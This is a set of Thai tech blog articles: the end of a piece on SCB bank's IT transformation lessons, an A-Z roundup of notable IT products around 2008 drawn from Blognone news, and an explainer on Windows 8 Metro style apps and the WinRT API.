พร้อมกับโจทย์ว่าต้องทำให้เร็ว ผลคือมีแต่คนอยากจะออกจากโครงการ มีคนร้องไห้ มีคนลาออก ทางทีมบริหารจึงต้องยอมถอยกันมาสักหน่อย โดยนำหลักการหรือวิธีการบางอย่างของ agile มาใช้งาน แต่ไม่ใช้ทั้งหมด SCB เลือกใช้บริษัทภายนอกหลายรายเข้ามาช่วยพัฒนา แต่แนวทางการจ้างงานแบบเก่าที่จ้างเป็นโครงการใหญ่ๆ ตาม requirement ก็ใช้ไม่ได้แล้วอีกเหมือนกัน เพราะโครงการซอฟต์แวร์ยุคใหม่ requirement เปลี่ยนแปลงตลอดเวลา ต้องปรับตัวกันเร็วมาก ก็ต้องเปลี่ยนวิธีการจ้างมาเป็นแบบตามวันทำงาน (man-day) แทน ### บทเรียนของฝ่ายไอทีในธนาคารใหญ่ คุณธนา เล่าว่าปัจจุบันธนาคารเปลี่ยนมุมมองต่อไอทีไปมาก จุดเปลี่ยนสำคัญคือผู้บริหารระดับสูงต้องเข้าใจความต้องการของฝ่ายไอทีด้วย ที่ผ่านมา ธนาคารทำแต่โครงการเล็กๆ ที่ไม่ได้เปลี่ยนแปลงแกนหลักขององค์กร คนอื่นที่อยู่นอกฝ่ายไอทีจึงไม่เห็นผลกระทบมากนัก การลองทำอะไรใหม่ๆ เล็กๆ ไปเรื่อยๆ มันจึงไม่ได้เปลี่ยนแปลงอะไร รอบนี้เป็นการทำโครงการใหญ่มาก มันเกิดผลกระทบสูงมากที่คนมองเห็นและจับต้องได้ ทีมงานเองก็จำเป็นต้องปรับตัว หาคนรุ่นใหม่ๆ เข้ามาเสริมกับทีมงานเดิมๆ เพื่อให้เห็นการเปลี่ยนแปลง บทเรียนของทีม SCB Digital มีด้วยกัน 3 ข้อคือ - ต้องให้ผู้ใหญ่เข้าใจก่อน ซึ่งตอนนี้ไม่ใช่เรื่องยากแล้ว เพราะผู้บริหารทุกองค์กรรู้แล้วว่าต้องลงทุนด้านไอที - ให้ทำโครงการใหญ่ๆ ที่เห็นผลกระทบสูงเลย - เอาคนใหม่เข้ามาเยอะๆ สร้างเลือดใหม่ที่มีวิธีคิดแบบใหม่ อย่าพยายามเปลี่ยนองค์กรด้วยการเปลี่ยนคนชุดเดิม ต้องหาคนใหม่เข้ามาเสริมทีมด้วย ส่วนคนไอทีแบบไหนที่ SCB ต้องการ ก็เป็นคนที่พร้อมเปิดใจรับเทคโนโลยีใหม่ๆ เพราะ SCB มีฐานเทคโนโลยีใหม่ๆ ให้ลองเล่นเยอะมาก บวกกับมีลูกค้าขนาดใหญ่ระดับหลายสิบล้านคน ซึ่งมีองค์กรไม่กี่แห่งในไทยที่มีลูกค้าระดับนี้ ดังนั้นการเข้ามาใช้เทคโนโลยีใหม่ๆ รองรับลูกค้าจำนวนมากขนาดนี้ จึงเป็นปัจจัยที่ดึงดูดคนเข้ามาได้ เพราะมันท้าทายนั่นเอง
# A-Z ข่าว IT ในรอบปี ที่คุณควรรู้จัก แวดวงในเรื่องของ IT นับได้ว่ามีการพัฒนาขึ้นทุกวัน หากเราพลาดการติดตามข่าวสารในวงการ IT ไปเพียงแค่ครู่เดียวก็อาจจะทำให้เราตกหล่นข้อมูลบางอย่างที่ควรรู้ไปได้ ผมซึ่งส่วนตัวเป็นสมาชิกของเว็บ Blognone ที่ติดตามอ่านข่าวสารมาอย่างเหนียวแน่นเป็นเวลานาน แต่ไม่มีโอกาสที่จะได้เขียนหรือแปลข่าวอะไรดีๆ เพื่อตอบแทนเว็บ Blognone ซักเท่าไหร่ ก่อนหน้านี้ผมเคยเห็นรูปภาพการนำตัวอักษร A-Z มาแก้เป็นเทคโนโลยีต่างๆ ที่จัดทำขึ้นโดยชาวต่างชาติท่านหนึ่ง วันนี้ผมจึงได้อยากที่จะสร้างบทความนี้ขึ้นมาโดยอ้างอิงข่าวต่างๆ จากใน Blognone และจัดทำเป็นตัวอักษรเลียนแบบชาวต่างชาติท่านนั้น เพื่อให้เพื่อนๆ พี่ๆ น้องๆ ที่อาจจะพลาดข่าวสารที่ควรรู้บางอย่างได้รู้กันนะครับ บทความนี้ผมเขียนขึ้นมาเองโดยได้แนวคิดมาจากรูปภาพของชาวต่างชาติท่านนั้นและนำมาแก้ไขไปซะส่วนใหญ่ตามที่ผมวิเคราะห์เอง ผมไม่ทราบแหล่งที่มาของภาพนั้นเพราะได้มาจาก Fwd mail จึงไม่สามารถระบุได้ แต่หากใครต้องการนำบทความนี้ไปเผยแพร่ผมก็ยินดี แต่ขอให้ใส่เครดิตให้ผมด้วยก็แล้วกันนะครับ **A - [[Apple Inc.](http://www.apple.com/)]** - ปี 2007-08 นับได้ว่าเป็นปีทองของบริษัท Apple เลยก็ว่าได้ ทั้งการเริ่มเข้ามาตีตลาดมือถืออย่าง เครื่อง iPhone การเติบโตของจำนวนผู้ใช้ Mac OS X Leopard การขาย Media Content Online จนได้รับการขนานนามให้เป็น [ที่หนึ่งใน online store ของสหรัฐอเมริกา](http://www.blognone.com/node/7413) **B - [Blu-ray Disc]** - มาตรฐานเทคโนโลยีการจัดเก็บข้อมูลความจุสูง หลังจากการต่อสู้กันอย่างยาวนานระหว่าง Blu-ray Disc และ HD-DVD สุดท้าย Blu-ray ก็เป็นผู้ชนะในศึกนี้ การทำตลาดของ Sony ทั้งการสร้างให้เครื่องเกมส์อย่าง PlayStation 3 เป็นเครื่องเล่นที่ใช้ Format แบบ Blu-ray และ[การร่วมกันของพันธมิตรสตูดิโอภาพยนตร์ที่หันมาให้ความสนใจ Format Blu-ray](http://www.blognone.com/node/1508)มากขึ้น ทำให้ Blu-ray เป็นจุดสนใจอย่างมากที่สุด **C - [Centrino 2 Technology]** - [การเปิดตัวมาตรฐานแบบใหม่จากบริษัทผลิต CPU ชื่อก้องโลก Intel](http://blognone.com/node/8344) สำหรับเครื่องคอมพิวเตอร์แบบพกพา **D - [[del.icio.us](http://del.icio.us/)]** - Web service 2.0 ศูนย์รวมบุ๊คมาร์คส่วนตัวของชาวอินเทอร์เน็ต ที่คุณสามารถค้นหาสิ่งที่คุณต้องการผ่านประสบการณ์ของคนอื่นได้ง่ายๆ โดยการใช้งานผ่าน tag ที่ผู้คนทั่วโลกร่วมกันสร้างขึ้นมา ซึ่งปัจจุบันนั้นเป็นส่วนนึงของทาง yahoo แต่สถานการณ์ในปัจจุบันก็ยังไม่ค่อยแน่นอนเนื่องจาก[ผู้ก่อตั้ง Del.icio.us ลาออกจาก Yahoo! แล้ว](http://www.blognone.com/node/8125) **E - [[eBay shopping website](http://www.ebay.com/)]** - ในโลกยุค IT เช่นปัจจุบัน การเข้ามาของการขายสินค้าผ่านระบบ online หรือที่เรียกว่า e-commerge นับได้ว่า eBay เป็นบริษัทอันดับ 1 ของโลกที่ใครๆ ต้องรู้จัก **F - [[Firefox web browser](http://www.mozilla.com/)]** - คงปฏิเสธไม่ได้เลยสำหรับ Web Browser มาแรงของมูลนิธิ Mozilla สำหรับการออกเวอร์ชั่นใหม่ Firefox 3.0 Software ระดับโลกที่สามารถ[สร้างสถิติมีผู้ Download มากที่สุดใน 24 ช.ม](http://www.blognone.com/node/8230) และกินส่วนแบ่งตลาด Browser เพิ่มขึ้นจากอดีต **G - [Google Product]** - บริษัทระดับโลกที่สามารถสร้าง Brand ของตัวเองให้ติดตลาดในทุกๆด้านบนโลก Online ผลิตภัณฑ์มากมายที่ทำให้ทั่วโลกไม่มีใครที่จะไม่รู้จัก google [อ่านข่าวเกี่ยวกับ google ที่นี่](http://www.blognone.com/topics/google) **H - [[hi5 social network](http://www.hi5.com/)]** - สังคมบนโลกออนไลน์ที่โด่งดังมากที่สุดในเมืองไทย (แม้ว่าในต่างประเทศเขาจะนิยมเล่น Facebook มากกว่าก็ตาม) ณ ปัจจุบันในเมืองไทยคงไม่มีใครที่จะไม่รู้จัก hi5 แล้วล่ะ เพราะทำง่าย สนุก เป็นที่นิยมของวัยรุ่น .. แล้วคุณล่ะ มีฮิห้าแล้วหรือยัง? **I - [iPhone 3G Mobile]** - ผลิตภัณฑ์มือถือที่มาแรงที่สุดแห่งปี สำหรับเครื่องโทรศัพท์มือถือในยุค Third Generation ด้วยการดีไซน์ที่ทันสมัยบวกเข้ากับ Software ที่มีคุณภาพจาก apple แล้วคุณจะไม่อยากได้ iPhone ไว้ครอบครองเลยงั้นหรือ? [Review แรกของ iPhone 3G](http://www.blognone.com/node/8320) **J - [Java Platform]** - เทคโนโลยีสำหรับการพัฒนา Application ที่ไม่มี Deverloper คนไหนที่จะไม่รู้จัก ด้วยการที่มีคุณสมบัติ Platform independence (การทำงานบนเครื่องต่างระบบได้) ทำให้ java สามารถที่จะตีตลาดอุตสาหกรรม Software ในทุกๆ ด้านได้ง่าย [อ่านข่าว Java เพิ่มเติมที่นี่](http://www.blognone.com/topics/java) **K - [[K-Lite Codec Pack]](http://www.free-codecs.com/download/K_lite_codec_pack.htm)** - ในปัจจุบัน Format ในเรื่องของสื่อมัลติมีเดียเกิดขึ้นมามากมาย การบีบอัดไฟล์วีดีโอและเสียงต่างๆ เพื่อให้มีคุณภาพมากที่สุด K-Lite Codec Pack เป็นชุดโปรแกรมที่รวบรวม Codec ต่างๆ ที่ใช้ในการ decode หรือ encode ไฟล์วีดีโอและเสียงต่างๆ เพื่อให้คุณได้ความบันเทิงอย่างเต็มที่ในการดูภาพยนตร์ภายในที่พักอาศัย ถึงแม้ว่าในปัจจุบันจะมี Code Pack เจ้าอื่นๆ เกิดขึ้นมากมาย ทั้ง Community Codec pack , Vista Codec pack แต่ K-lite Code pack ก็ยังเป็นที่นิยมของหลายๆ คนอยู่ดี โดยปัจจุบันเวอร์ชั่นล่าสุดคือ K-Lite Codec Pack 4.0 **L - [Linux Operating System]** - ณ วินาทีนี้คำว่า Linux ถือเป็นชื่อคุ้นหูกันแล้วสำหรับระบบปฏิบัติการฟรีที่มีผู้คนนิยมใช้เพิ่มมากขึ้นเรื่อยๆ ทั้งการใช้งานในระดับ Personal Computer และ Server โดยเป็นระบบปฏิบัติการที่มีการแตกแยกย่อยรุ่นเป็นจำนวนมากที่สุดในโลก [อ่านข่าว Linux เพิ่มเติมที่นี่](http://www.blognone.com/topics/linux) **M - [MSN Program]** - Instance Messenger ชื่อก้องโลกของบริษัท Microsoft มิติใหม่ของการพูดคุยสื่อสารกันบนโลกอินเตอร์เน็ต ที่ทำได้ง่ายเพียงแค่พิมพ์และคลิก ถึงแม้ปัจจุบันจะมีการเปลี่ยนชื่อเป็น Window live Messenger แล้วก็ตาม แต่ MSN ก็ยังเป็นคำพูดติดปากที่ใครๆ ยังต้องนำมาพูดถึง พูดไปคงไม่มีใครเชื่อหรอกถ้าคุณจะบอกว่าคุณไม่เคยเล่นเอ็มเอสเอ็น **N - [Nintendo Company Ltd.]** - พูดได้เลยว่าเป็นการกลับมาที่ร้อนแรงมากสำหรับบริษัทผู้ผลิตเกมส์ยุคบุกเบิกกับเครื่องเกมส์ที่แหวกแนวการเล่นเกมส์ใดๆทั้งปวงกับ เครื่องเกมส์ Console Nintendo Wii หรือจะเป็นเครื่องเกมส์พกพาอย่าง Nintendo DS ที่มียอดขายถล่มทลาย ทำให้[นินเทนโดกลับสู่ยุครุ่งเรืองอีกครั้ง](http://www.blognone.com/node/7628) **O - [[OpenOffice](http://www.openoffice.org/)]** - Free Software สำหรับการจัดการเอกสารที่มีการพัฒนาอย่างต่อเนื่อง ([ปัจจุบัน เวอร์ชั่น 2.4](http://www.blognone.com/node/7345) และจะออก [Open Office 3.0](http://www.blognone.com/node/7280) ในช่วงปลายปี) เริ่มที่จะมีการใช้กันอย่างแพร่หลายภายในองค์กรของเมืองไทยแล้ว เพื่อลดค่าใช้จ่ายของการใช้งานซอฟต์แวร์ลิขสิทธิ์ **P - [PlayStation Game]** - PlayStation3 เครื่องเกมส์ในยุคใหม่จากบริษัท Sony ที่ตอบทุกความอลังการของ gamer ได้อย่างดีเยี่ยม เทคโนโลยีการแสดงผลขั้นสูงที่จะสะกดทุกอารมณ์การเล่นเกมส์ของคุณไว้ มาพร้อมเทคโนโลยีใหม่ Bue-ray Disc ที่พร้อมจะกลายเป็นมาตรฐานหลักของความบันเทิงในอนาคต ถึงแม้ว่าสถานการณ์ช่วงนี้จะซบเซาก็ตามแต่ก็ยังมีเครื่องเกมส์ Portable อย่าง PSP (PlayStation Portable) เป็นตัวช่วยกู้หน้าในการเป็นเครื่องเกมส์พกพาที่เป็น Media Portable ที่สมบูรณ์ที่สุดตอบทุกความต้องการทั้งการดูหนัง ฟังเพลง เล่นเกมส์ อีกทั้งยังมี Software ที่เรียกว่า Homebrew อีกมากมาย **Q - [Quanta Computer Incorporated]** - น้อยคนนักที่จะรู้ถึงบริษัทชื่อนี้ บริษัทสัญชาติไต้หวันนาม Quanta คือผู้ผลิตเครื่องคอมพิวเตอร์โน้ตบุ๊กอันดับต้นๆ ของโลกโดยผลิตในชื่อยี่ห้อต่างๆ เช่น แอปเปิล, เดลล์ , เอชพี , ฟูจิสึ , โตชิบ้า เป็นต้น อีกทั้งยังเป็น[ผู้ผลิตคอมพิวเตอร์ราคาถูกภายใต้ชื่อโครงการ OLPC](http://www.blognone.com/node/4283) (One Laptop per Child) เพื่อกระจายการเข้าถึงเทคโนโลยีแก่เด็กในประเทศด้อยพัฒนาอีกด้วย **R - [RSS Technology]** - การรับ-ส่งข้อมูลข่าวสารอย่างรวดเร็วนับว่ามีความสำคัญมากในปัจจุบัน RSS หรือ Really Simple Syndication เป็นบริการใหม่บนเว็บไซต์ที่ใช้สำหรับดึงข่าวจากเว็บต่างๆ มาแสดงบนหน้าเว็บเพจ โดยนำมาเฉพาะหัวข้อข่าว เมื่อผู้ใช้คลิกลิงค์ก็จะแสดงรายละเอียดข่าว ทำให้คุณได้รับข่าวสารอัพเดตใหม่ได้อย่างรวดเร็วและไม่พลาดข่าวสำคัญที่คุณควรรู้ คุณล่ะมี RSS ของ Blognone แล้วหรือยังถ้ายัง[คลิกที่นี่เลย](http://www.blognone.com/atom.xml) **S - [Symbian Operation System]** - ระบบปฏิบัติการบนเครื่องโทรศัพท์มือถือที่มีโทรศัพท์ในท้องตลาดมากที่สุดถึง 235 รุ่น รวมส่วนแบ่งตลาดร้อยละ 60 มีซอฟต์แวร์รองรับการใช้งานเป็นจำนวนมาก อีกทั้งในปีนี้ยังมีข่าว[การโอเพนซอร์สของระบบปฏิบัติการซิมเบี้ยน](http://www.blognone.com/node/8151)อีกด้วย ทำให้นักพัฒนาซอฟต์แวร์เริ่มสนใจระบบปฏิบัติการตัวนี้มากยิ่งขึ้น **T - [[Twitter social networking and micro-blogging service](http://www.twitter.com/)]** - บริการรูปแบบใหม่ในการอัพเดทข้อความที่เริ่มได้รับความนิยมเป็นจำนวนมาก ด้วยการใช้งานที่ง่ายบวกกับความสามารถที่หลากหลายทำให้เป็นบริการที่ครองใจผู้คนได้ไม่ยาก ข้อดีของ Twitter นั้นมีตัวอย่างให้เห็นมากมายมาแล้ว อาทิเช่น [ช่วยตามหาโทรศัพท์ !!](http://www.blognone.com/node/7543),[ช่วยรายงานข่าวแผ่นดินไหวในจีน](http://www.blognone.com/node/7794),[ช่วยให้นักศึกษารอดคุก](http://www.blognone.com/node/7535) [ซึ่งจำนวนผู้ใช้ Twitter ในไทยนั้นมีเท่าไหร่](http://www.blognone.com/node/7672)ก็ไม่อาจจะทราบได้ว่ามากหรือน้อยเพียงใด **U - [[Ubuntu Operating System](http://www.ubuntu.com/)]** - ระบบปฏิบัติการสายพันธุ์ Linux ที่นับได้ว่าเป็น distro ที่มีคนใช้มากที่สุดในโลก ด้วย Interface สวยงามของ Gnome การมีพัฒนาอย่างต่อเนื่อง อีกทั้งยังเป็นระบบปฏิบัติการ Opensourceไม่ต้องเสียค่าลิขสิทธิ์ ทำให้มีผู้ที่สนใจที่จะใช้อูบันตูหรืออูบุนตูเป็นระบบปฏิบัติการประจำเครื่องคอมพิวเตอร์ตัวเก่งเพิ่มขึ้นเรื่อยๆ ปัจจุบัน [Ubuntu 8.04.1 ออกแล้ว](http://www.blognone.com/node/8245) **V - [Vista Operating System]** - ระบบปฏิบัติการสายพันธุ์ Windows ตัวที่ 6 ต่อจาก Windows xp ที่เริ่มเข้ามาเป็นมาตรฐานสำหรับคอมพิวเตอร์ส่วนบุคคล การตีตลาดแบบลิขสิทธิ์ติดเครื่องจาก Microsoft ทำให้มีผู้ใช้งานระบบปฏิบัติการ Windows Vista มากยิ่งขึ้น ซึ่งถึงแม้โดยภาพรวมจะได้รับการตอบรับที่ไม่ดีนัก แต่ก็ถือว่าเป็นระบบปฏิบัติการที่เรียกเสียงฮือฮาจากผู้ใช้งานได้ไม่น้อย ปัจจุบันมี[การออก Service Pack 1 เพื่อแก้ไขข้อบกพร่องต่างๆ](http://www.blognone.com/node/7019) บ้างแล้ว **W - [[Wikipedia the free encyclopedia](http://www.wikipedia.org/)]** - สารานุกรมระดับโลกที่ทุกคนสามารถที่จะช่วยกันสร้าง Content (ข้อมูลข่าวสาร) ร่วมกัน ด้วยลักษณะการให้บริการข้อมูลข่าวสารที่เป็นปัจจุบันมากที่สุด ทำให้ง่ายต่อการค้นหาข้อมูลใดๆ บนโลกใบนี้ ปัจจุบัน [Wikipedia มีบทความเกิน 10 ล้านบทความแล้ว](http://www.blognone.com/node/7365) **X - [Xbox 360 Game Console]** - เครื่องเกมส์คอนโซลที่สามารถติดตลาดนักเล่นเกมส์ด้วยยอดขายที่ไม่น่าเชื่อทั้งในฝั่งเอเซียและอเมริกา หลายค่ายเกมส์ดังหันมาสนใจเครื่องเกมส์จาก Microsoft มากขึ้น อีกทั้งการ[ประกาศว่าจะลง Xbox 360 ด้วยสำหรับเกมส์ RPG ชื่อดังอย่าง Final Fantasy XIII](http://www.blognone.com/node/8341) ก็สร้างเสียงฮือฮาได้อย่างท่วมล้น **Y - [[YouTube video sharing](http://www.youtube.com/)]** - ในโลกยุคปัจจุบันที่การสื่อสารบนโลกอินเตอร์เน็ตมีความรวดเร็วขึ้น "YouTube" เว็บบริการแบ่งปันวีดีโอ นับว่าเป็นบริการที่มีคนใช้บริการมากที่สุดในโลกและไม่มีใครหรอกที่จะไม่รู้จัก YouTube **Z - [[Zoho Office Suite](http://www.zoho.com/)]**- Web 2.0 Service ที่ให้บริการด้านการจัดการเอกสาร ที่มีรูปแบบการใช้งานง่ายไม่จำเป็นต้องติดตั้งโปรแกรมลงบนเครื่อง เพียงแค่คุณมีเครื่องคอมพิวเตอร์ที่สามารถเชื่อมต่ออินเตอร์เน็ตได้ คุณก็สามารถที่จะจัดการเอกสารของคุณได้โดยง่าย สนับสนุนไฟล์งานทั้งจากตระกูล MS Office หรือ OpenOffice หากคุณยังไม่เคยใช้ล่ะก็...ลองดูสิครับ แล้วคุณจะติดใจ **@ - [@ Email Address]** - จดหมายอิเล็กทรอนิคส์ บริการอย่างหนึ่งที่นิยมใช้กันอย่างแพร่หลายมากในยุคที่การสื่อสารมีความสำคัญเป็นอย่างมาก สิ่งที่ยืนยันตัวตนของตัวเองภายในโลกอินเตอร์เน็ต ที่เริ่มใช้กันเป็นมาตรฐานในสังคมออนไลน์ที่ทุกคนต้องมี แล้วคุณล่ะมี Email Address แล้วหรือยัง? **. - [.NET Framwork]** - Platform สำหรับการพัฒนา Application ถูกสร้างขึ้นมาโดยบริษัท Microsoft ด้วยการใช้งานที่ง่ายผ่านโปรแกรมในตระกูล Visual Studio ที่สามารถพัฒนา Application ได้หลากหลายภาษาตั้งแต่ C# , C , C++ , Basic , .NET asp และอื่นๆ นับได้ว่าเป็นพื้นฐานในการเขียนโปรแกรมของเหล่าโปรแกรมเมอร์ในปัจจุบันก็ว่าได้ **********************************************************บทความอาจจะยาวไปหน่อยนะครับ และเนื่องจากว่าผมเรียนทางด้าน Software Engineering ไม่ได้เรียนทางด้านภาษาซักเท่าไหร่ หากการใช้ภาษาของผมผิดพลาดประการใดต้องขออภัยมา ณ ที่นี่ด้วยครับและฝากติชม บทความนี้ด้วยล่ะกันนะครับ ที่มา : Bongbank แห่งเว็บ Blognone.com
# รู้จักกับ Metro Style App และ WinRT คู่หูของการพัฒนาโปรแกรมบน Windows 8 คนที่ติดตามข่าวของ Windows 8 คงเห็นแผนภาพ diagram แสดงโครงสร้างการพัฒนาแอพของ Windows 8 ที่แสดงใน keynote เปิดตัว ไมโครซอฟท์แยกประเภทของแอพเป็น 2 อย่างคือ Desktop Apps ซึ่งหมายถึงแอพแบบเดิมๆ ที่เราใช้กันอยู่ทุกวันนี้ (ไม่ว่าจะเขียนเป็น native/.NET/web app ก็ตาม) และแอพชนิดใหม่ **Metro Style Apps** สำหรับใช้ในโหมดแท็บเล็ต (และมีเพียงแอพแบบหลังที่ย้ายไปรันบน ARM ได้ด้วย - [ข่าวเก่า](http://www.blognone.com/news/26411/%E0%B9%84%E0%B8%A1%E0%B9%82%E0%B8%84%E0%B8%A3%E0%B8%8B%E0%B8%AD%E0%B8%9F%E0%B8%97%E0%B9%8C%E0%B8%95%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B3%E0%B8%96%E0%B8%B2%E0%B8%A1-office-metro-%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A3%E0%B8%B1%E0%B8%99%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%81%E0%B8%81%E0%B8%A3%E0%B8%A1%E0%B9%80%E0%B8%94%E0%B8%B4%E0%B8%A1%E0%B8%9A%E0%B8%99-arm-%E0%B8%A2%E0%B8%B1%E0%B8%87%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%A3%E0%B8%A7%E0%B8%A1%E0%B8%81%E0%B8%B1%E0%B8%9A-windows-phone)) เพื่อความเข้าใจที่ดียิ่งขึ้น ก็ขอลงภาพ diagram ซ้ำอีกรอบ บริเวณสีเขียวในภาพ คือ พื้นที่ใหม่หมดของการพัฒนาแอพในอาณาจักรของไมโครซอฟท์ ซึ่งก็คงทำให้หลายๆ คนเกิดคำถามว่าบทบาทของมันต่อการพัฒนาแอพแบบเดิมๆ อย่าง native/.NET จะเป็นอย่างไรบ้าง เช่น เราจะต้องเลิกเขียน native/.NET กันแล้วเปลี่ยนมาเขียน Metro แทนหรือเปล่า? เท่าที่ผมหาข้อมูลได้ ก็ตอบแบบฟันธงได้เลยว่า **มันไม่ได้มาแทน .NET** ถ้าจะให้อธิบายแบบรวบรัดที่สุด ต้องบอกว่า Metro Apps เกิดมาเพื่อแท็บเล็ตและจอสัมผัสเท่านั้น และเป็นแอพในฝั่ง client เพียงอย่างเดียวด้วย ทำงานได้เฉพาะบนแพลตฟอร์ม Windows (และ Windows Phone ในอนาคต) ไม่สามารถทำงานข้ามแพลตฟอร์มแบบ .NET ด้วยซ้ำ (อนาคตไม่แน่) เราจะมองว่ามันเป็นคู่แข่งของ Android App หรือ iOS App จากฝั่งไมโครซอฟท์ก็พอได้ ก่อนจะลงลึกไปที่ Metro Style App เราต้องย้อนดู "ทางเลือก" ของการพัฒนาแอพในอาณาจักรของไมโครซอฟท์ก่อน ปัจจุบันไมโครซอฟท์เปิดโอกาสให้เราพัฒนาแอพได้ 4 แบบ 1. **native code** เขียนเชื่อมต่อกับ Win32 API ที่อยู่คงกระพันมานาน เป้าหมายของมันก็คือแอพที่ทำงานบนเดสก์ท็อปวินโดวส์ ไม่รันข้ามแพลตฟอร์ม 2. **.NET** เขียนเชื่อมต่อกับ .NET API (เช่น WPF, WCF) เลือกภาษาได้หลายภาษา (ที่นิยมคือ C#/VB) ทำงานข้ามแพลตฟอร์มได้ (อย่างน้อยก็บนแมค) 3. **web app** เขียนด้วย HTML/JavaScript รันผ่านเบราว์เซอร์ทั้งหมด ไม่ต้องติดตั้ง (อันนี้เหมือนกับ web app บนแพลตฟอร์มอื่นๆ) ทำงานข้ามแพลตฟอร์ม ไม่ต้องคอมไพล์ แต่ความสามารถอาจจะน้อยไปบ้าง และต้องต่อเน็ตเพื่อใช้งาน 4. **Silverlight/WP7** เป็นเวอร์ชันลดรูปของข้อ (2) และใช้งานบนมือถือ Windows Phone เท่านั้น การมาถึงของ Metro Style ถือเป็นวิธีการพัฒนาแอพแบบที่ 5 ของไมโครซอฟท์ มันจะมาพร้อมกับ API ตัวใหม่ที่เรียกว่า WinRT (ย่อมาจาก Windows Runtime) ซึ่งถือเป็น API ชุดใหม่ที่ไม่เกี่ยวข้องกับ Win32 และ .NET เดิมเลย Metro/WinRT ถือเป็นแพลตฟอร์มการพัฒนาแบบใหม่ทั้งหมด แต่ก็อิงอยู่บนเทคโนโลยีเดิมหลายจุด ในส่วนของ WinRT ที่อยู่ด้านล่าง ไมโครซอฟท์จะนำความสามารถใน Win32 และ .NET API มาจัดระเบียบใหม่ คัดเฉพาะสิ่งที่จำเป็นจริงๆ เพื่อให้เบา (เช่น ตัด WinForm ออกไป, ไม่มี GDI, ไม่มี XNA ต้องเรียก DirectX ตรงๆ - ดู[รายการ API ทั้งหมดของ WinRT](http://msdn.microsoft.com/en-us/library/windows/apps/hh464947%28v=VS.85%29.aspx) และ [การเปรียบเทียบ API ระหว่าง WinRT กับ API แบบเดิมๆ](http://msdn.microsoft.com/en-us/library/windows/apps/hh464945%28v=VS.85%29.aspx)) ส่วนของภาษาที่ใช้พัฒนาแอพ Metro ก็มีให้เลือก 3 แนวทางตามชอบใจ 1. HTML + JavaScript (โดยเชื่อมกับ WinRT API ลักษณะเดียวกับ webOS หรือ Silverlight รุ่นแรกๆ ซึ่งแน่นอนว่ามันเอาไปรันบนแพลตฟอร์มอื่นๆ ไม่ได้) รันผ่านเอนจินจาวาสคริปต์ของ IE 2. XAML + C/C++ รันแบบ native 3. XAML + C#/VB โดยรันผ่าน CLR ของ .NET ตอนนี้เป้าหมายของแอพแบบ Metro คือการรันบน Windows 8 (ไม่ว่าจะเป็น x86/ARM) เท่านั้น แต่ใน keynote เราก็เห็นเดโมการพอร์ตแอพ Metro ไปอยู่บน Windows Phone ได้ด้วย (ซึ่งเดิมทีแอพ Windows Phone เป็น Silverlight) ตรงนี้คงเห็นชัดว่าไมโครซอฟท์เริ่มขยับหนี Silverlight ในความหมายเดิม และใน Windows Phone รุ่นถัดๆ ไป เราน่าจะเห็นการใช้ Metro/WinRT มากขึ้น อธิบายง่ายๆ ว่า Metro/WinRT จะมาแทนวิธีการพัฒนาแบบที่สี่เป็นหลัก นั่นคือ Silverlight จะค่อยๆ ลดบทบาทลง ส่วนวิธีการพัฒนาโปรแกรม 3 แบบแรกคือ native/.NET/web app จะยังมีที่ทางของมันอยู่เหมือนเดิม (อย่างน้อยก็ใน Windows 8 แบบเดสก์ท็อป x86) เพียงแต่ในระยะยาว ไมโครซอฟท์น่าจะผลักดันให้แอพบนแพลตฟอร์มวินโดวส์หันมาใช้ Metro/WinRT มากขึ้น ข้อมูลจาก ReadWriteWeb ระบุว่าตอนนี้ไมโครซอฟท์ยังไม่มีแผนจะทำ Metro/WinRT แบบข้ามแพลตฟอร์ม (เหมือนกับ .NET ที่มีรันไทม์ไปติดตั้งบนแพลตฟอร์มอื่นๆ ได้) และการนำ Metro/WinRT ไปรันบนกลุ่มเมฆ (เหมือนกับ .NET บน Azure) ในช่วงแรกคงเป็นเฉพาะสภาพแวดล้อมในการพัฒนาแบบ client บนแท็บเล็ตเท่านั้น กระบวนการพัฒนาแอพ Metro นอกจากตัวแอพแล้ว ยังมีเรื่องการทำแพกเกจและส่งขึ้นไปขายบน Windows Store (ร้านขายแอพของ Windows 8 ซึ่งไม่ใช่ Windows Marketplace) แต่ตรงนี้คงไม่ต่างอะไรจากแอพบนมือถือในปัจจุบันมากนัก ในสายตาของนักพัฒนาฝั่งไมโครซอฟท์ คงปรับตัวกันไม่ยากนักเพราะใช้เทคโนโลยีเดิมๆ อย่าง C#, VB, HTML/JavaScript, XAML แต่ก็มีส่วน WinRT และสไตล์ของ Metro ที่ต้องเรียนรู้ใหม่บ้าง และการพัฒนาโปรแกรมที่ต้องเริ่มใหม่ตั้งแต่แรก เครื่องมือพัฒนาเป็น Visual Studio 11 ซึ่งถ้าอยู่สายนี้ก็คงคุ้นมืออยู่แล้ว ช่วงนี้ Metro/WinRT ยังเพิ่งเริ่มต้นเท่านั้น แต่ดูจากทิศทางของไมโครซอฟท์แล้ว ก็คงอยู่กับมันยาวทีเดียว ข้อมูลจาก [Tim Anderson’s ITWriting](http://www.itwriting.com/blog/4866-a-few-facts-about-microsofts-new-windows-runtime.html), [ReadWriteWeb](http://www.readwriteweb.com/hack/2011/09/build-2011-what-is-winrt-and-i.php) เอกสารเพิ่มเติมของไมโครซอฟท์ - [What are Metro style apps?](http://msdn.microsoft.com/en-us/library/windows/apps/hh464920) แนะนำแนวคิด - [Getting started with Windows Metro style app development](http://msdn.microsoft.com/library/windows/apps/br211386/) เริ่มต้นพัฒนาแอพแบบ Metro - [Metro style app reference](http://msdn.microsoft.com/en-us/library/windows/apps/br229578) คู่มืออ้างอิงของ Metro - [The Windows Runtime](http://msdn.microsoft.com/en-us/library/windows/apps/hh464942%28v=VS.85%29.aspx) รู้จักตัวเทคโนโลยี WinRT หมายเหตุ: ในบทความข้างต้นผมไม่ได้พูดถึงการเขียนเกมบน Metro เพราะเดี๋ยวจะซับซ้อนเกินไป และเป็นหัวข้อค่อนข้างเฉพาะ วิธีการเขียนเกมบน Metro จะใช้ C++ เรียก native API อย่าง DirectX โดยตรง (ซึ่งปัจจุบันเกมจำนวนมากก็เขียนแบบนี้อยู่แล้ว) รายละเอียดอ่านใน [Building your first Metro style game with C++](http://msdn.microsoft.com/en-us/library/windows/apps/br229580)
